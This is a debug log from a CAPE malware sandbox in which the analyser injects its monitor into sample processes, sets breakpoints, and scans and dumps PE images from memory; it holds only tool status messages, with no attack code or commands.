2019-01-10 03:36:41,638 [root] INFO: Announced 32-bit process name: 1257032286.exe pid: 2332
2019-01-10 03:36:41,684 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:36:41,716 [root] INFO: Added new process to list with pid: 2332
2019-01-10 03:36:41,778 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:36:41,809 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:36:41,903 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:36:41,996 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:36:41,996 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:36:42,089 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2332
2019-01-10 03:36:42,151 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:36:42,276 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:36:42,308 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:36:42,401 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:36:42,542 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:36:42,667 [root] INFO: Disabling sleep skipping.
2019-01-10 03:36:42,776 [root] INFO: Monitor successfully loaded in process with pid 2332.
2019-01-10 03:36:42,869 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\1132_4024236710412019
2019-01-10 03:36:42,994 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:36:43,165 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:36:43,290 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:36:43,431 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:36:44,617 [root] INFO: Notified of termination of process with pid 1132.
2019-01-10 03:36:45,413 [root] INFO: Process with pid 1132 has terminated
2019-01-10 03:36:55,911 [root] INFO: Announced 32-bit process name: 1674519319.exe pid: 2528
2019-01-10 03:36:56,036 [root] INFO: Added new process to list with pid: 2528
2019-01-10 03:36:56,191 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:36:56,519 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:36:56,660 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2528
2019-01-10 03:36:56,971 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:36:57,237 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:36:57,486 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:36:57,706 [root] INFO: Disabling sleep skipping.
2019-01-10 03:36:57,970 [root] INFO: Monitor successfully loaded in process with pid 2528.
2019-01-10 03:36:58,313 [root] DEBUG: ProtectionHandler: Address: 0x5bde20, RegionSize: 0x43d1
2019-01-10 03:36:58,438 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x5bde20
2019-01-10 03:36:58,516 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x5bde20, AllocationSize: 0x43d1, ThreadId: 0x9c4
2019-01-10 03:36:58,673 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x5bde20 and Type=0x0.
2019-01-10 03:36:58,812 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x5bde20, size 0 with Callback 0x74952ea0, ThreadHandle = 0xac.
2019-01-10 03:36:59,000 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x5bde20
2019-01-10 03:36:59,155 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x5bde20
2019-01-10 03:36:59,312 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x5bde20.
2019-01-10 03:36:59,515 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x590000, size 0x321f1).
2019-01-10 03:36:59,671 [root] DEBUG: DumpPEsInRange: Scanning range 0x590000 - 0x5c21f1.
2019-01-10 03:36:59,701 [root] INFO: Announced 32-bit process name: 3065331339.exe pid: 2436
2019-01-10 03:36:59,842 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x590000-0x5c21f1.
2019-01-10 03:36:59,858 [root] INFO: Added new process to list with pid: 2436
2019-01-10 03:37:00,013 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ljxoi\CAPE\2528_9525936710412019
2019-01-10 03:37:00,029 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:37:00,170 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:37:00,233 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2436
2019-01-10 03:37:00,311 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2528_9525936710412019
2019-01-10 03:37:00,342 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:37:00,372 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x5bde20 - 0x5c21f1.
2019-01-10 03:37:00,420 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x1f0000
2019-01-10 03:37:00,467 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x5bde20.
2019-01-10 03:37:00,513 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:37:00,545 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x590000.
2019-01-10 03:37:00,592 [root] INFO: Disabling sleep skipping.
2019-01-10 03:37:00,622 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:37:00,684 [root] INFO: Monitor successfully loaded in process with pid 2436.
2019-01-10 03:37:00,747 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:37:00,888 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:37:00,966 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:37:01,091 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:37:01,138 [root] DEBUG: ProtectionHandler: Address: 0x688b80, RegionSize: 0x13191
2019-01-10 03:37:01,168 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:37:01,216 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x688b80
2019-01-10 03:37:01,262 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:37:01,325 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x688b80, AllocationSize: 0x13191, ThreadId: 0xa88
2019-01-10 03:37:01,434 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x688b80 and Type=0x0.
2019-01-10 03:37:01,573 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x688b80, size 0 with Callback 0x74952ea0, ThreadHandle = 0xac.
2019-01-10 03:37:01,667 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2528_325137710412019
2019-01-10 03:37:01,684 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x688b80
2019-01-10 03:37:01,762 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:37:01,808 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x688b80
2019-01-10 03:37:01,885 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:37:01,917 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x688b80.
2019-01-10 03:37:02,010 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:37:02,058 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x660000, size 0x3bd11).
2019-01-10 03:37:02,119 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:37:02,183 [root] DEBUG: DumpPEsInRange: Scanning range 0x660000 - 0x69bd11.
2019-01-10 03:37:02,308 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x660000-0x69bd11.
2019-01-10 03:37:02,431 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ljxoi\CAPE\2572_386237710412019
2019-01-10 03:37:02,931 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2572_386237710412019
2019-01-10 03:37:03,055 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x688b80 - 0x69bd11.
2019-01-10 03:37:03,180 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x688b80.
2019-01-10 03:37:03,275 [root] INFO: Notified of termination of process with pid 2528.
2019-01-10 03:37:03,352 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x660000.
2019-01-10 03:37:03,446 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:37:03,493 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0x28000
2019-01-10 03:37:03,555 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x428000.
2019-01-10 03:37:03,601 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:37:03,634 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:37:03,680 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:37:03,743 [root] DEBUG: DumpProcess: Module entry point VA is 0x41df1d
2019-01-10 03:37:03,914 [root] INFO: Process with pid 2528 has terminated
2019-01-10 03:37:03,960 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2572_774337710412019
2019-01-10 03:37:04,007 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:37:04,069 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:37:04,132 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x428000.
2019-01-10 03:37:04,226 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:37:13,118 [root] INFO: Announced 32-bit process name: 3876917383.exe pid: 3008
2019-01-10 03:37:13,118 [root] INFO: Added new process to list with pid: 3008
2019-01-10 03:37:13,118 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:37:13,134 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:37:13,150 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 3008
2019-01-10 03:37:13,164 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:37:13,164 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:37:13,180 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:37:13,180 [root] INFO: Disabling sleep skipping.
2019-01-10 03:37:13,196 [root] INFO: Monitor successfully loaded in process with pid 3008.
2019-01-10 03:37:13,398 [root] DEBUG: ProtectionHandler: Address: 0x5dde20, RegionSize: 0x43d1
2019-01-10 03:37:13,414 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x5dde20
2019-01-10 03:37:13,414 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x5dde20, AllocationSize: 0x43d1, ThreadId: 0x390
2019-01-10 03:37:13,414 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x5dde20 and Type=0x0.
2019-01-10 03:37:13,430 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x5dde20, size 0 with Callback 0x74952ea0, ThreadHandle = 0xac.
2019-01-10 03:37:13,430 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x5dde20
2019-01-10 03:37:13,446 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x5dde20
2019-01-10 03:37:13,446 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x5dde20.
2019-01-10 03:37:13,461 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x5b0000, size 0x321f1).
2019-01-10 03:37:13,461 [root] DEBUG: DumpPEsInRange: Scanning range 0x5b0000 - 0x5e21f1.
2019-01-10 03:37:13,461 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x5b0000-0x5e21f1.
2019-01-10 03:37:13,476 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ljxoi\CAPE\3008_4771337710412019
2019-01-10 03:37:13,507 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\3008_4771337710412019
2019-01-10 03:37:13,507 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x5dde20 - 0x5e21f1.
2019-01-10 03:37:13,523 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x5dde20.
2019-01-10 03:37:13,523 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x5b0000.
2019-01-10 03:37:13,539 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:37:13,539 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:37:13,555 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:37:13,555 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:37:13,571 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:37:13,571 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:37:13,585 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:37:13,618 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\3008_5861337710412019
2019-01-10 03:37:13,632 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:37:13,632 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:37:13,632 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:37:13,648 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:37:14,663 [root] INFO: Notified of termination of process with pid 3008.
2019-01-10 03:37:15,505 [root] INFO: Process with pid 3008 has terminated
2019-01-10 03:37:16,940 [root] INFO: Announced 32-bit process name: 2810629864.exe pid: 2208
2019-01-10 03:37:16,940 [root] INFO: Added new process to list with pid: 2208
2019-01-10 03:37:16,940 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:37:16,956 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:37:16,956 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2208
2019-01-10 03:37:16,971 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:37:16,986 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:37:16,986 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:37:17,003 [root] INFO: Disabling sleep skipping.
2019-01-10 03:37:17,003 [root] INFO: Monitor successfully loaded in process with pid 2208.
2019-01-10 03:37:31,026 [root] INFO: Announced 32-bit process name: 3750816931.exe pid: 2924
2019-01-10 03:37:31,026 [root] INFO: Added new process to list with pid: 2924
2019-01-10 03:37:31,026 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:37:31,042 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:37:31,059 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2924
2019-01-10 03:37:31,073 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:37:31,089 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:37:31,089 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:37:31,089 [root] INFO: Disabling sleep skipping.
2019-01-10 03:37:31,105 [root] INFO: Monitor successfully loaded in process with pid 2924.
2019-01-10 03:37:31,338 [root] DEBUG: ProtectionHandler: Address: 0x61de20, RegionSize: 0x43d1
2019-01-10 03:37:31,338 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x61de20
2019-01-10 03:37:31,355 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x61de20, AllocationSize: 0x43d1, ThreadId: 0xb68
2019-01-10 03:37:31,355 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x61de20 and Type=0x0.
2019-01-10 03:37:31,385 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x61de20, size 0 with Callback 0x74952ea0, ThreadHandle = 0xac.
2019-01-10 03:37:31,385 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x61de20
2019-01-10 03:37:31,401 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x61de20
2019-01-10 03:37:31,417 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x61de20.
2019-01-10 03:37:31,417 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x5f0000, size 0x321f1).
2019-01-10 03:37:31,433 [root] DEBUG: DumpPEsInRange: Scanning range 0x5f0000 - 0x6221f1.
2019-01-10 03:37:31,448 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x5f0000-0x6221f1.
2019-01-10 03:37:31,448 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ljxoi\CAPE\2924_4493137710412019
2019-01-10 03:37:31,494 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2924_4493137710412019
2019-01-10 03:37:31,510 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x61de20 - 0x6221f1.
2019-01-10 03:37:31,510 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x61de20.
2019-01-10 03:37:31,526 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x5f0000.
2019-01-10 03:37:31,542 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:37:31,542 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:37:31,558 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:37:31,558 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:37:31,572 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:37:31,572 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:37:31,588 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:37:31,605 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2924_5893137710412019
2019-01-10 03:37:31,619 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:37:31,619 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:37:31,619 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:37:31,635 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:37:32,650 [root] INFO: Notified of termination of process with pid 2924.
2019-01-10 03:37:33,257 [root] INFO: Process with pid 2924 has terminated
2019-01-10 03:37:35,832 [root] INFO: Announced 32-bit process name: 1398632723.exe pid: 2604
2019-01-10 03:37:35,832 [root] INFO: Added new process to list with pid: 2604
2019-01-10 03:37:35,848 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:37:35,848 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:37:35,862 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2604
2019-01-10 03:37:35,878 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:37:35,894 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:37:35,894 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:37:35,894 [root] INFO: Disabling sleep skipping.
2019-01-10 03:37:35,910 [root] INFO: Monitor successfully loaded in process with pid 2604.
2019-01-10 03:37:50,355 [root] INFO: Announced 32-bit process name: 4032832645.exe pid: 2420
2019-01-10 03:37:50,355 [root] INFO: Added new process to list with pid: 2420
2019-01-10 03:37:50,371 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:37:50,387 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:37:50,387 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2420
2019-01-10 03:37:50,403 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:37:50,417 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x1f0000
2019-01-10 03:37:50,417 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:37:50,434 [root] INFO: Disabling sleep skipping.
2019-01-10 03:37:50,448 [root] INFO: Monitor successfully loaded in process with pid 2420.
2019-01-10 03:37:50,667 [root] DEBUG: ProtectionHandler: Address: 0x2ede20, RegionSize: 0x43d1
2019-01-10 03:37:50,683 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x2ede20
2019-01-10 03:37:50,698 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x2ede20, AllocationSize: 0x43d1, ThreadId: 0xb5c
2019-01-10 03:37:50,698 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x2ede20 and Type=0x0.
2019-01-10 03:37:50,714 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x2ede20, size 0 with Callback 0x74952ea0, ThreadHandle = 0xac.
2019-01-10 03:37:50,730 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x2ede20
2019-01-10 03:37:50,746 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x2ede20
2019-01-10 03:37:50,760 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x2ede20.
2019-01-10 03:37:50,760 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x2c0000, size 0x321f1).
2019-01-10 03:37:50,760 [root] DEBUG: DumpPEsInRange: Scanning range 0x2c0000 - 0x2f21f1.
2019-01-10 03:37:50,776 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x2c0000-0x2f21f1.
2019-01-10 03:37:50,776 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ljxoi\CAPE\2420_7775037710412019
2019-01-10 03:37:50,808 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2420_7775037710412019
2019-01-10 03:37:50,823 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x2ede20 - 0x2f21f1.
2019-01-10 03:37:50,823 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x2ede20.
2019-01-10 03:37:50,838 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x2c0000.
2019-01-10 03:37:50,838 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:37:50,855 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:37:50,871 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:37:50,871 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:37:50,885 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:37:50,885 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:37:50,901 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:37:50,948 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2420_9025037710412019
2019-01-10 03:37:50,963 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:37:50,963 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:37:50,963 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:37:50,963 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:37:51,993 [root] INFO: Notified of termination of process with pid 2420.
2019-01-10 03:37:52,072 [root] INFO: Process with pid 2420 has terminated
2019-01-10 03:37:55,051 [root] INFO: Announced 32-bit process name: 1674315261.exe pid: 1356
2019-01-10 03:37:55,051 [root] INFO: Added new process to list with pid: 1356
2019-01-10 03:37:55,066 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:37:55,082 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:37:55,098 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1356
2019-01-10 03:37:55,114 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:37:55,128 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:37:55,128 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:37:55,144 [root] INFO: Disabling sleep skipping.
2019-01-10 03:37:55,161 [root] INFO: Monitor successfully loaded in process with pid 1356.
2019-01-10 03:38:09,263 [root] INFO: Announced 32-bit process name: 2459023548.exe pid: 1304
2019-01-10 03:38:09,279 [root] INFO: Added new process to list with pid: 1304
2019-01-10 03:38:09,293 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:38:09,325 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:38:09,371 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1304
2019-01-10 03:38:09,388 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:38:09,388 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x2e0000
2019-01-10 03:38:09,388 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:38:09,403 [root] INFO: Disabling sleep skipping.
2019-01-10 03:38:09,403 [root] INFO: Monitor successfully loaded in process with pid 1304.
2019-01-10 03:38:09,637 [root] DEBUG: ProtectionHandler: Address: 0x52de20, RegionSize: 0x43d1
2019-01-10 03:38:09,653 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x52de20
2019-01-10 03:38:09,653 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x52de20, AllocationSize: 0x43d1, ThreadId: 0x884
2019-01-10 03:38:09,668 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x52de20 and Type=0x0.
2019-01-10 03:38:09,668 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x52de20, size 0 with Callback 0x74952ea0, ThreadHandle = 0xac.
2019-01-10 03:38:09,684 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x52de20
2019-01-10 03:38:09,700 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x52de20
2019-01-10 03:38:09,700 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x52de20.
2019-01-10 03:38:09,700 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x500000, size 0x321f1).
2019-01-10 03:38:09,714 [root] DEBUG: DumpPEsInRange: Scanning range 0x500000 - 0x5321f1.
